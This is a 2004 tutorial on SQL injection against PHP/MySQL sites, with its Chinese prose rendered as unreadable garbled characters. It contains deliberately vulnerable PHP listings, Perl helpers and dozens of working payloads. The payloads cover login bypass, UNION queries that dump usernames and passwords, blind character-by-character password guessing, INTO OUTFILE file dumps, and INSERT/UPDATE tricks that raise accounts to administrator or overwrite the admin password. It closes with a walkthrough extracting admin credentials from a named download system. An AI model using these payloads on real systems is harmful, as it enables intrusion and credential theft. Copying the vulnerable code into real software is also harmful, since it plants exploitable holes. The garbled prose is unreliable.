SQL Injection with MySQL
ߣangelʣԭ
ڣ2004-09-16
Ѿڡڿͷߡ7¿תעд˺ܾãżĽҲָвٴµĵطλֿ˲ҪЦдڡAdvanced SQL Injection with MySQL֮ǰһ¡
ĽڽѧĿģΪɵĹ˸Ų𣬱дΪдݾԡʵʲô©ӭȫʹ̳http://www.4ngel.net/forumsҽ
ǰ
2003꿪ʼϲűԽԽ࣬оASPעҲҿĹSQLעһƪ99ĸдģڹѾ¯ˣڲſʼעɴ˿ڵⷽļڹһκܴ࣬˵ҶSQLע빥Ҳ൱Ϥˣڸվ㶼ЩƾƷΪһƪ£ҾûбҪ˵˵䶨ԭλѾﵽ¯ĵز̡ȨָСܡ
php+Mysqlע
ܿphp+Mysqlע¿ܱȽ٣עWEB©ͿԷ֣ʵЩ©ʵһӡڹоPHP˱оASPʵ̫࣬ԣûע⣬PHPİȫԱASPߺܶ࣬ºܶ˲Խż
ˣPHPվĽ죬SQLעЧ鷳һֹʽЧΪ70% ϵվSQL Injection©ڴְȫվ㣬鷳ΪMYSQL4µİ汾Dz֧ģҵphp.ini magic_quotes_gpc ΪOn ʱύıе ' (), " (˫), \ (б) and ַԶתΪзбߵתַעٵ谭
ڵʱݳĴ룬ҪûŵγЧĹеѣڵļѾŵӦijЩϡֻҪо飬ʵЧһҲѣɹҲܸߣҪ߳һ
עûо˵£Ǽmagic_quotes_gpcΪoff
php+Mysqlע
ܶΪPHP+MYSQLעһҪõţûа취MSSQLʹádeclare @a sysname select @a=<command> exec master.dbo.xp_cmdshell @aţʵǴҶעһ˵Ƕעʶϵһ
ΪʲôأΪʲôţ˫ַdzʹdirҲַѣִܵУдĴ룺
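// Analogy used by the article: a shell command built by string concatenation.
// FIX: in a PHP double-quoted string `\"` is an escaped quote, so the original
// "dir c:\" never terminated; the backslash itself has to be doubled.
$command = "dir c:\\";
system($command);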
ַֻȻ˵ָϵͳ˵SQL䣬ҪǹSQLִУͲǵַôʲô»õţʲôʱأSQL䣺
SELECT * FROM article WHERE articleid='$id'
SELECT * FROM article WHERE articleid=$id
дڸֳжձ飬ȫDzͬģһڰѱ$idһԵУʹύıַʹȷSQL䣬ҲִУڶ䲻ͬûаѱŽУύһУֻҪոǿոıΪSQLִУӷֱύɹעĻ䣬֮ͬ
ָ$idΪ
1' and 1=2 union select * from user where userid=1/*
ʱSQLΪ
SELECT * FROM article WHERE articleid='1' and 1=2 union select * from user where userid=1/*'
ָ$idΪ
1 and 1=2 union select * from user where userid=1
ʱSQLΪ
SELECT * FROM article WHERE articleid=1 and 1=2 union select * from user where userid=1
ڵһеţDZȱպǰĵţʹΪSQLִУҪע͵ԭSQLеĺĵţſԳɹע룬php.inimagic_quotes_gpcΪon߱ǰʹaddslashes()ǵĹͻữΪУڶûŰҲÿȥպϡעֱͣύOKˡ
ҿһЩ¸ûаpinkeyesġphpעʵиǾSQL䣬ûаŵģҲҪΪĿԲע룬ϸPHPBBĴ룬ͿԷ֣Ǹ$forum_idڵSQLдģ
$sql = "SELECT *
FROM " . FORUMS_TABLE . "
WHERE forum_id = $forum_id";
ûõŰŸpinkeyesһлɳˣԴдPHPʱǵõŰѱȻҪİȫʩDZزٵġ
Ⱦһ˽һPHPµעԺԭȻҲԸߴѧϰЧSQL䡣
һû֤ӣȽһݿһݱһ¼£
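-- Demo schema for the login example (user.php).
-- Passwords are stored in plaintext on purpose so the blind-injection
-- walkthrough (LEFT(password,n)='..', ORD(MID(password,n,1))=..) has
-- readable values. Never do this in a real schema: store a salted hash.
CREATE TABLE `user` (
  `userid` int(11) NOT NULL auto_increment,
  `username` varchar(20) NOT NULL default '',
  `password` varchar(20) NOT NULL default '',
  PRIMARY KEY (`userid`)
) ENGINE=MyISAM AUTO_INCREMENT=3;
-- ENGINE= replaces the original dump's TYPE=MyISAM, which MySQL 5.5 removed;
-- the ENGINE keyword has been accepted since the 4.0 series.

#
# Data for table `user`
#
INSERT INTO `user` (`userid`, `username`, `password`) VALUES (1, 'angel', 'mypass');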
֤ûļĴ£
<?php
// user.php -- login check used as the first injection target.
// INTENTIONALLY VULNERABLE (tutorial listing, do not reuse):
//  * $username and $password are never assigned in this file; the example
//    URLs pass them as GET parameters, so the script depends on PHP's
//    register_globals to populate them.
//  * Both values are interpolated into the SQL string without any quoting,
//    so a single quote breaks out of the literal (angel' or '1=1, angel'/*).
$servername = "localhost";
$dbusername = "root";   // demo only: root with an empty password
$dbpassword = "";
$dbname = "injection";
mysql_connect($servername,$dbusername,$dbpassword) or die ("ݿʧ");
$sql = "SELECT * FROM user WHERE username='$username' AND password='$password'";
$result = mysql_db_query($dbname, $sql);
// On a malformed query $result is FALSE and mysql_fetch_array() emits the
// warning reproduced below -- an error oracle that tells the attacker
// whether the injected statement parsed.
$userinfo = mysql_fetch_array($result);
if (empty($userinfo))
{
echo "½ʧ";
} else {
echo "½ɹ";
}
// Echoing the query back is for teaching only; in a real application it is
// an information leak in its own right.
echo "<p>SQL Query:$sql<p>";
?>
ʱύ
http://127.0.0.1/injection/user.php?username=angel' or 1=1
ͻ᷵أ
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in F:\www\injection\user.php on line 13
½ʧ
SQL Query:SELECT * FROM user WHERE username='angel' or 1=1' AND password=''
PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in F:\www\injection\user.php on line 13
𣿵űպϺûע͵ĵţµûȷԣɴ˿֪ǹ䲻MysqlȷִУҪ¹죺
http://127.0.0.1/injection/user.php?username=angel' or '1=1
ʱʾ½ɹ˵ɹˡύ
http://127.0.0.1/injection/user.php?username=angel'/*
http://127.0.0.1/injection/user.php?username=angel'%23
ͰѺע͵ˣ˵˵ύIJ֮ͬύĵһ㣬ASPÿ˵Ƿdz㷺ģ˵˰ɣڶǸmysqlԣmysql֧/*#עʽύʱǰѺĴע͵ֵעڱ⣬IEַύ#ɿյģڵַύʱӦύ%23Ż#ͳɹעˣöˣɴ˿ԿPHPASPǿˡ
ͨӴӦöPHP+MYSQLעиԵʶ˰ɣ
乹
PHP+MYSQLעIJ֤ϵĹĹȤζĵطACCESSMSSQLͬͬԷӵ쾡¡ӡ
һ
һѵPHPģҲύַʾм¼ģʵΣҲΪûؼֽģѯĵطеļ¼ܶѯƾġ
ѯֻIJӦòݲƻãҪ̫ġй¶˽֪㲻Σһ棺
<!-- search.php: keyword search whose LIKE clause is the injection point. -->
<form method="GET" action="search.php" name="search">
<input name="keywords" type="text" value="" size="15"> <input type="submit" value="Search">
</form>
<p><b>Search result</b></p>
<?php
// INTENTIONALLY VULNERABLE (tutorial listing). The three commented-out lines
// are the fix the article gives later: addslashes() for quotes, plus
// escaping of the LIKE metacharacters _ and % so a keyword of "%" or "__"
// cannot match every row. Here the raw $_GET value goes straight into the
// query, and `%' ORDER BY articleid/*` rewrites the rest of the statement.
$servername = "localhost";
$dbusername = "root";   // demo only: root with an empty password
$dbpassword = "";
$dbname = "injection";
mysql_connect($servername,$dbusername,$dbpassword) or die ("ݿʧ");
$keywords = $_GET['keywords'];
if (!empty($keywords)) {
//$keywords = addslashes($keywords);
//$keywords = str_replace("_","\_",$keywords);
//$keywords = str_replace("%","\%",$keywords);
// $db_prefix and $search are not defined in this listing -- presumably set
// elsewhere (TODO confirm); if unset they expand to "" (with a notice).
$sql = "SELECT * FROM ".$db_prefix."article WHERE title LIKE '%$keywords%' $search ORDER BY title DESC";
$result = mysql_db_query($dbname,$sql);
$tatol=mysql_num_rows($result);   // sic: "total"
echo "<p>SQL Query:$sql<p>";
if ($tatol <=0){
echo "The \"<b>$keywords</b>\" was not found in all the record.<p>\n";
} else {
while ($article=mysql_fetch_array($result)) {
// NOTE(review): $article is a row array; an index such as $article['title']
// looks to have been lost in rendering -- htmlspecialchars() on an array
// does not print the row.
echo "<li>".htmlspecialchars($article)."<p>\n";
} //while
}
} else {
echo "<b>Please enter some keywords.</b><p>\n";
}
?>
һдģȱ飬ǾͿԸдﵽע롱ĿģûΣ롰___ .__ %ƵĹؼʱݿем¼ȡڱύ
%' ORDER BY articleid/*
%' ORDER BY articleid#
__' ORDER BY articleid/*
__' ORDER BY articleid#
SQLͱıˣ
SELECT * FROM article WHERE title LIKE '%%' ORDER BY articleid/*%' ORDER BY title DESC
SELECT * FROM article WHERE title LIKE '%__' ORDER BY articleid#%' ORDER BY title DESC
ͻгм¼صģԸı˳ȻΣҲעһַʽ˰ɣ
ѯֶ
ѯֶֿԷֳ֣ѯͿѯֲѯACCESSMSSQL࣬ǿ㡣֪ΪʲôΪASPѣASPоʹõĸPHPҪССĸĶ£
ѯ
һSQL䣬̳Աעϵͳ鿴ûϵģ
<?php
// user.php (lookup variant) -- "show me the user with this name".
// INTENTIONALLY VULNERABLE (tutorial listing): $username is never assigned
// here; the example URLs supply it as a GET parameter (register_globals),
// and it is interpolated unquoted/unescaped into the WHERE clause.
// With only one condition in the query, an attacker appends their own AND
// (angel' and LEFT(password,1)='m) and reads the answer from whether a row
// comes back -- a boolean blind-injection oracle.
$servername = "localhost";
$dbusername = "root";   // demo only: root with an empty password
$dbpassword = "";
$dbname = "injection";
mysql_connect($servername,$dbusername,$dbpassword) or die ("ݿʧ");
$sql = "SELECT * FROM user WHERE username='$username'";
$result = mysql_db_query($dbname,$sql);
$row = mysql_fetch_array($result);
if (!$row) {
echo "ü¼";
echo "<p>SQL Query:$sql<p>";
exit;
}
// NOTE(review): $row is an array; the column index (e.g. $row['userid'])
// appears to have been lost in rendering.
echo "ҪѯûIDǣ$row\n";
echo "<p>SQL Query:$sql<p>";
?>
ύûΪʱͻûIDΪǷͻʾӦĴDzѯûϣǿԴ²ʹݱһûǵһijǵøղŵ֤𣿺ڵȣһAND£
SELECT * FROM user WHERE username='$username' AND password='$password'SELECT * FROM user WHERE username='$username'
ͬľǵΪʱͻȷʾϢǹAND֣ʹⲿΪ棬ǵĿҲʹﵽˣøղŽuserݿ⣬ûΪangelΪmypass
ӣӦ֪˰ɣύ
http://127.0.0.1/injection/user.php?username=angel' and password='mypass
ǾΪģΪύSQLӣ
SELECT * FROM user WHERE username='angel' AND password='mypass'
ʵʵĹУǿ϶֪ģ֪ݿĸֶΣǾͿʼ̽ˣȻȡ볤ȣ
http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6
ACCESSУLEN()ȡַȣMYSQLУҪʹLENGTH()ֻҪûйҲ˵SQLִУǷؽ֣ǷûIDǷءü¼ڡûΪangel볤Ϊ6ʱ棬ͻ᷵ؼ¼DzǺASPһLEFT()RIGHT()MID()룺
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,2)='my
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,3)='myp
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,4)='mypa
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,5)='mypas
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,6)='mypass
벻dz𣿼ɣȻʵвƣ滹ὲӵӦá
ѯ
ⲿ־ͺASPеˣһҪUNIONSQL䣬յľֶεMYSQLοֲᣬ֪ SELECT е select_expression (select_expression ʾϣ[ֶ]) гбͬ͡һ SELECT ѯʹõΪء˵ҲUNIONѡֶֶͶӦǰSELECTһңǰSELECTΪ棬ͬʱSELECTĽǰSELECTΪ٣ͻ᷵صڶSELECTõĽijЩ滻ڵһSELECTԭӦʾֶΣͼ
ͼֱ۶˰ɣӦ֪ǰѯݱĽṹDzѯݱֶͬҲͬǾͿύ:
SELECT * FROM article WHERE articleid='$id' UNION SELECT * FROM
ֶֶһֻܸͬͺֶύ
SELECT * FROM article WHERE articleid='$id' UNION SELECT 1,1,1,1,1,1,1 FROM
ͻᱨ
The used SELECT statements have a different number of columns
֪ͺֶ1ԣΪ1int\str\varֻͣҪıһԲµġۣкϸӡ
ǿݽṹһݱ
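-- Demo table queried by show.php. Its three columns (int, varchar, text) are
-- why the UNION payloads use `SELECT 1,username,password`: MySQL only
-- requires the column COUNT of each SELECT to match (otherwise "The used
-- SELECT statements have a different number of columns"); values are coerced.
CREATE TABLE `article` (
  `articleid` int(11) NOT NULL auto_increment,
  `title` varchar(100) NOT NULL default '',
  `content` text NOT NULL,
  PRIMARY KEY (`articleid`)
) ENGINE=MyISAM AUTO_INCREMENT=3;
-- ENGINE= replaces the original dump's TYPE=MyISAM, which MySQL 5.5 removed.

#
# Data for table `article`
#
INSERT INTO `article` (`articleid`, `title`, `content`) VALUES (1, 'һĺ', 'йĽƶҵҪʦͣ');
INSERT INTO `article` (`articleid`, `title`, `content`) VALUES (2, 'Һ', 'Һˣʲô');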
ֶͷֱintvarchartextUNIONϲѯʱIJѯıĽṹһͿáSELECT *κһһֻáSELECT 1,1,1,1ˡ
ļһܱʾµļܶվ㶼ҳûйˣԳΪԵע㣬ļΪӣʼǵעʵ顣
<?php
// show.php -- display one article by id; the UNION-injection target.
// INTENTIONALLY VULNERABLE (tutorial listing): $id is never assigned here
// (register_globals from ?id=...) and is interpolated into a quoted literal
// with no escaping, so `1' union select 1,username,password from user/*`
// closes the quote, appends a second SELECT and comments out the trailing '.
// Because only the first row is fetched, the payloads use a non-existent id
// ('' or 99999) so the UNION row is the one printed.
$servername = "localhost";
$dbusername = "root";   // demo only: root with an empty password
$dbpassword = "";
$dbname = "injection";
mysql_connect($servername,$dbusername,$dbpassword) or die ("ݿʧ");
$sql = "SELECT * FROM article WHERE articleid='$id'";
$result = mysql_db_query($dbname,$sql);
$row = mysql_fetch_array($result);
if (!$row)
{
echo "ü¼";
echo "<p>SQL Query:$sql<p>";
exit;
}
// NOTE(review): $row is an array; the indexes (presumably $row['title'] and
// $row['content']) look to have been lost in rendering.
echo "title<br>".$row."<p>\n";
echo "content<br>".$row."<p>\n";
echo "<p>SQL Query:$sql<p>";
?>
£ύһ
http://127.0.0.1/injection/show.php?id=1
ͻʾarticleidΪ1£DzҪ£ҪûϢҪѯuserDzѯղǽuser
$idûй˸ᣬҪshow.phpļеSQLдӣ
SELECT * FROM article WHERE articleid='$id' UNION SELECT * FROM user
еŰűģύ
http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user/*
˵ӦʾûusernamepasswordֶεݲŶôʾأͼ
ʵύarticleid=1articleڵģִнˣȻǰSELECTĽύյֵύһڵֵͻijҪĶ
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*
http://127.0.0.1/injection/show.php?id=99999' union select 1,username,password from user/*
ͼ
ھֶӦĵطʾҪݡ˼·ԼӦã滹ὲһЩļɡ
ļ
DZȽ쵫һƵļǾԿµSQL䣺
select * from table into outfile 'c:/file.txt'
select * from table into outfile '/var/www/file.txt'
䣬һڳ˭ԼݵأDZݣҲûмֱݷҪԼ죬ǰ
• 뵼ܷʵĿ¼ء
• ܷʵĿ¼ҪпдȨޣʧܡ
• ȷӲ㹻µݣټ
• ȷҪѾͬļᵼµʧܣʾFile 'c:/file.txt' already existsԷֹݿļ/etc/passwdƻ
Ǽuser.phpshow.phpļһһû½ʵ̫ˣԷϢܸӣֲдExploitҪµʲôʱΧģֱӵȫݺˡuser.phpļIJѯ䣬ǰinto outfileıʽעܵҪϢˣ
SELECT * FROM user WHERE username='$username' into outfile 'c:/file.txt'
֪ôʵǵĿģǾͺӦ䣺
http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt
˴ʾӷص俴ǵSQLȷʵעȷˣʹִҲDzѯˣļǹԹԵıˣͼ
ڴ뱾WHEREָһǵݽݣ뵼ȫأʵֻܼҪʹWHEREΪ٣ָһͿԲñWHEREˣ1=1ˣ
http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt
ʵʵSQLΪ
SELECT * FROM user WHERE username='' or 1=1 into outfile 'c:/file.txt'
usernameIJǿյģǼˣ1=1ԶģorǰWHEREͲˣǧandŶDzܵȫݵġ
Ȼ㣬¾ֱӵݣͼ
ǿĵļôأõUNIONϲѯһǰӦúUNIONһӦһ
SELECT * FROM article WHERE articleid='1' union select 1,username,password from user into outfile 'c:/user.txt'
ԵļˣҪύ
http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user into outfile 'c:/user.txt
ļdzˣһ⣬ǰIJѯarticleid='1'ΪˣԵҲµһ֣ͼ
ǰӦʹǰIJѯΪ٣ֻѯݣֻҪύ
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt
ܵõҪϣ
ֵעҪļmagic_quotes_gpcûдҳҲûõaddslashes()вܶԵκιˣΪύ·ʱһҪŰϵͳʶһ·Ҳóchar()ʲôͽ͡
INSERT
ΪMYSQLעSELECTʹشˣʵΣIJǾINSERTUPDATE䣬Ӳ࣬˵˵INSERTҪӦڸдݣֹ㷺ڵӣݽṹ
-- Registration/profile table for the INSERT and UPDATE injection examples.
-- It re-declares the `user` table from the login example with extra columns;
-- drop the earlier one before creating this.
-- userlevel is the privilege field the payloads target: per the surrounding
-- text 1 is an ordinary user and 3 the top (administrator) level.
-- No ENGINE clause, so the server default storage engine applies.
CREATE TABLE `user` (
`userid` INT NOT NULL AUTO_INCREMENT ,
`username` VARCHAR( 20 ) NOT NULL ,
`password` VARCHAR( 50 ) NOT NULL ,
`homepage` VARCHAR( 255 ) NOT NULL ,
`userlevel` INT DEFAULT '1' NOT NULL ,  -- default: ordinary user
PRIMARY KEY ( `userid` )
);
еuserlevelûĵȼ1ͨû2ͨԱ3dzԱһעĬעͨû£
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
ĬuserlevelֶDz1еıûо˾ֱдݿģ֪ʲô뷨ԣֱע룬ʹһעdzԱעʱ$homepageͿԴﵽдĿģָ$homepageΪ
http://4ngel.net', '3)#
ݿʱͱɣ
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3)#', '1');
עΪԱˡ÷Ҳһľԣ磬ûҪдıuserlevelֶݿĵһֶΣǰûеطע룬Ҳûа취ˡ
INSERTи㷺Ӧãҿоԭһġ
UPDATE
INSERTȣUPDATEӦøӹ㷺˲Ըдκݣøղŵע˵ݽṹҲ䣬ǿһûԼԼϣSQLһ㶼дģ
UPDATE user SET password='$password', homepage='$homepage' WHERE id='$id'
ûԼҳʲô뷨ܲڻȨްɣеSQLûиuserlevelֶΣôϰ취$homepage, ָ$homepageΪ
http://4ngel.net', userlevel='3
SQLͱ
UPDATE user SET password='mypass', homepage='http://4ngel.net', userlevel='3' WHERE id='$id'
DzֱɳԱˣuserlevelֶΣԼ
иӾģֱûϣǸղŵ䣬ΰȫһ㣬ʹMD5ܣ
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'
뱻ˣǻǿԹҪ䣬ָ$passwordΪ
mypass)' WHERE username='admin'#
ʱΪ
UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'
˸µҹĴDzڿ˵ǻûִаȻҲԴ$idָ֣$idΪ
' OR username='admin'
ʱΪ
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'
ҲԴﵽĵĿģ˵עǷdzļЩǴݿȡĹ̶ֵ$_SESSION['username']ȡϵSESSIONϢʱǾͿԭWHERE֮ǰԼWHEREע͵Ĵ룬ɴ˿ɼעҲעļ֮һЩɰע뷢ӵ쾡¡ò˵һ
ύʽGETPOSTύλÿǵַرıCOOKIEϢȣύķʽDZύύǹύֶͿˡ
Ӧ
1 ʹMYSQLú
ACCESSMSSQLеע룬кܶȽϸע뷽뵽ϵͳĵȣЩMYSQLҲܺܺõõӣʵMYSQLкܶúSQLͿʹעʱõϵͳϢмDZȽϳõģ
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
ľôҿԲMYSQLֲᣬUPDATE
UPDATE article SET title=$title WHERE articleid=1
ǿָ$titleΪϵĸΪûбŰԺȷִеģ
UPDATE article SET title=DATABASE() WHERE id=1
#ѵǰݿµtitleֶ
UPDATE article SET title=USER() WHERE id=1
#ѵǰ MySQL ûµtitleֶ
UPDATE article SET title=SYSTEM_USER() WHERE id=1
#ѵǰ MySQL ûµtitleֶ
UPDATE article SET title=SESSION_USER() WHERE id=1
#ѵǰ MySQL ûµtitleֶ
UPDATE article SET title=CURRENT_USER() WHERE id=1
#ѵǰỰ֤ƥûµtitleֶ
MYSQLõĺԻòõϢݿ汾֡ûǰݿȣǰѯӣύ
http://127.0.0.1/injection/show.php?id=1
Կһƪ£ô֪MYSQLݿϢأͬҲMYSQLúUNIONϲѯ֮¾ͼöˣԶȡļȻҪõUNIONͬҪUNIONֶ֪ͬݽṹֱӹ죺
http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()
ͿԷصǰݿݿ汾DZȽġ
渽һҺSuper•HeiдĴ룬ַתΪASCII롣лṩ
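#!/usr/bin/perl
# Convert a string to the comma-separated list of its byte values, for
# building MySQL CHAR(...) payloads when quotes are escaped
# (magic_quotes_gpc=On).
#   C:\>test.pl c:\boot.ini
#   99,58,92,98,111,111,116,46,105,110,105
# Written by Super*Hei for angel.
use strict;
use warnings;

# Decimal byte values of $str joined by commas. unpack('C*') yields raw
# bytes, so a multi-byte character expands to several numbers -- which is
# exactly what CHAR() expects.
sub to_char_list {
    my ($str) = @_;
    return join(",", unpack('C*', $str));
}

# Entry point: exactly one argument, printed without a trailing newline so
# the output can be pasted straight into a URL.
sub main {
    my @args = @_;
    if (@args != 1) {
        # FIX: the original usage text had its <string> placeholder eaten.
        print "Usage: $0 <string>\n";
        exit(1);
    }
    print to_char_list($args[0]);
    return 0;
}

main(@ARGV) unless caller;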
2ӵע
עǼmagic_quotes_gpcΪonˡ
֪εDzҪģַҪţԱܶ⡣ݣûа취עģҪǹתͣҪõCHAR()ASCII(),ORD(),CONV()Щˣٸӣ
SELECT * FROM user WHERE username='angel'
ʹ$usernameأܼύͿˡ
SELECT * FROM user WHERE username=char(97,110,103,101,108)
# char(97,110,103,101,108) ൱angelʮơ
SELECT * FROM user WHERE username=0x616E67656C
# 0x616E67656C ൱angelʮơ
ԼȥԺˣǰ˵ģǿԹı壬ȻDzܹʲôַֻӲãǰ(user,php)ǰѲѯΪuserid
SELECT * FROM user WHERE userid=userid
ģύ
http://127.0.0.1/injection/user.php?userid=1
ͿԲѯuseridΪ1ûϣΪ1֣ûŶνǹ죺
http://127.0.0.1/injection/user.php?userid=1 and password=mypass
ԴΪmypassַύ
http://127.0.0.1/injection/user.php?userid=1 and password='mypass'
magic_quotes_gpcĹϵǾԲܵġŻ/'ʲô취Щַ𣿾CHAR()ύ
http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)
أʵ֤CHAR()ǿеģǾͰCHAR()ýLEFTλ½⣡
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)=char(109)
أ˵useridΪ1ûpasswordֶεһλchar(109)Ǽ£
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,2)=char(109,121)
أ˵ȷӰ쵽ЧʣȻΣȫñȽȽϣ
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)
Ȼʵchar()ȷһΧܿͿԲ³˺ʱǿñȽȽϣ
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,3)>char(109,121,111)
ԭѾºõIJøıˣܿͿԲ꣺
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,6)=char(109,121,112,97,115,115)
Ȼmysql>ʾ»phpMyadminִУ
select char(109,121,112,97,115,115)
ͻ᷵أmypass
ȻҲʹSUBSTRING(str,pos,len)MID(str,pos,len)ַ str pos λ len ַӴACCESSһġǸղŵӣDzpasswordֶεĵλλԣλpλa죺
http://127.0.0.1/injection/user.php?userid=1 and mid(password,3,1)=char(112)
http://127.0.0.1/injection/user.php?userid=1 and mid(password,4,1)=char(97)
ҪĽͱųˡȻ鷳øİ취ord()ÿȥ鿴MYSQLοֲᣬúص͵ݣñȽбȽϡȻóĽҲͿˣҲύ
http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111
http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))<113
http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))=112
Ǿ͵óˣȻchar()ԭͺˡຯҿԼȥ飬ƪҲ˵ˡ
3ȷδ֪ݽṹֶμ
ݽṹUNIONϲѯҸߴһСɣҲǷdz÷dzҪļɣַUNIONԡ
ǰshow.phpļӣǿxxx.php?id=xxxURLʱҪUNIONҪ֪xxx.phpѯݱĽṹǿύȷжٸֶΣ
http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1
жٸ1ͱʾжٸֶΣԣֶͬͿ϶ֶ¶ˣͿ϶᷵ȷҳ棬ֶˣͿʼжͣʵҲףüĸ1magic_quotes_gpcDzţϰ취char()char(97)ʾĸa£
http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)
ַǾͻʾaַıҲ˵λΣͻ᷵ء0ͼ
жҪʲô飬ǰһֱ˵ҪḻܸõȷжϣΪĴǧģֻǾٸӣھԣԼдԼԵġ졣ϣʵսУע𣬲ҪհᣬòǸ
4ݱ
ڿȷδ֪ݽṹֶμ͵ĻϣֿԽһķݽṹǾDz±ʵʹUNIONϲѯʱܺIJѯôΡֻҪûϵ⣬ȷأҲ˵ǿĻϣһµˣղύ
http://127.0.0.1/injection/show.php?id=1 union select 1,1,1
ݣ˵ļѯıǴ3ֶεģȻںfrom table_nameҲ
http://127.0.0.1/injection/show.php?id=1 union select 1,1,1 from members
http://127.0.0.1/injection/show.php?id=1 union select 1,1,1 from admin
http://127.0.0.1/injection/show.php?id=1 union select 1,1,1 from user
Ǵڵģôͬ᷵ӦʾݣڣȻͻˣҵ˼·Ȼ©ļѯݽṹȷٽһѯֹûЧʵģһӾͿԲѯˣڲwww.***bai.netʵ漰
һ⣬ںܶ£ܶݱһǰǰͿöһݿ⡣磺
site_article
site_user
site_download
forum_user
forum_post
ȫʶߵĻԱӸǰDz½ͺ鷳ˣȫһбܡͲ˵ˣһһã^_^
ʵ
һڷdzվĹԣ֪ʶһδŵ֤ӰأdzվΪHB(www.***bai.net)HBʹõҹèϵͳϵͳϵͳѾˣǾͲˣϵͳǾģдµĵԲͬϵͳڱؽһģIJԡʵϣǰøݶļHB
ҵļshow.php?id=1ϿݽṹͱHBûиֶκͱ֪ҹèϵͳ1.0.1Ϣı19ֶΣύ
http://127.0.0.1/ymdown/show.php?id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
ע⣬191ҳ棬ҿԿԿ϶ֶûб䣬ҲͱˣֱӿҹèĬûݱǷڣ
http://127.0.0.1/ymdown/show.php?id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user
أͼURLԿ
ţHBǹģôõijҲ֪һãҲǣûж˺һȥӹ̳õģٿĬϵûidڲڣ
http://127.0.0.1/ymdown/show.php?id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
ˣ㲻idΪ1ûǰIJѯģݿϢֻǰIJѯΪ٣ʹѯĽʾҪעһ㣬show.phpļһδ룺
// Fragment of the real show.php (its endif is not shown in the article).
// The range check compares STRINGS: "0" and "999999999" are string literals,
// and when $id is not itself a numeric string PHP falls back to lexicographic
// comparison, so an id of `10000 union select ...` passes ('1' > '0' and
// '1' < '9'). Cast with intval() before comparing -- or better, use the cast
// value in the query as well.
if ($id > "0" && $id < "999999999" ):
// ... normal code path for a valid id ...
else:
echo "<p><center><a href=./list.php>¼</a></p>\n";
Ҳ˵ǵIDֵôҲ0999999999֮⣬HB϶ᳬ10000ģǾύ
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
ˣȫǡ1˵IDŶڵĻҳֻصȫDz꣬ΪжΪվʾꡣȷIDںҪȷDzǹԱа
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1
涨groupidΪ1dzԱȻȷϢˣǾֱӹ䣬Ҫû룬ٺ٣ȿymdownݽṹΪshow.phpDzѯģӦÿݽṹ
CREATE TABLE ymdown (
id int(10) unsigned NOT NULL auto_increment,
name varchar(100) NOT NULL,
updatetime varchar(20) NOT NULL,
size varchar(100) NOT NULL,
empower varchar(100) NOT NULL,
os varchar(100) NOT NULL,
grade smallint(6) DEFAULT '0' NOT NULL,
viewnum int(10) DEFAULT '0' NOT NULL,
downnum int(10) DEFAULT '0' NOT NULL,
homepage varchar(100), demo varchar(100),
brief mediumtext, img varchar(100),
sort2id smallint(6) DEFAULT '0' NOT NULL,
down1 varchar(100) NOT NULL,
down2 varchar(100),
down3 varchar(100),
down4 varchar(100),
down5 varchar(100),
PRIMARY KEY (id)
);
ûͶvarcharҪѡymdownvarcharvarcharдintĵطȻDzʾˣupdatetimeڣij20ܻʾȫǾͰûʾname⣩ʾsizeļСˣ191Уnamesizeֱǵڶ͵ĸύ
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
ɹҪû룬ͼ
֤Խ
̾ͽˣںڰװڸˣ½ǽע룬ĿѾﵽˣûбҪ̨ˣҺּSQL֤ǻȡǷȷύ
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49
#֤һλ
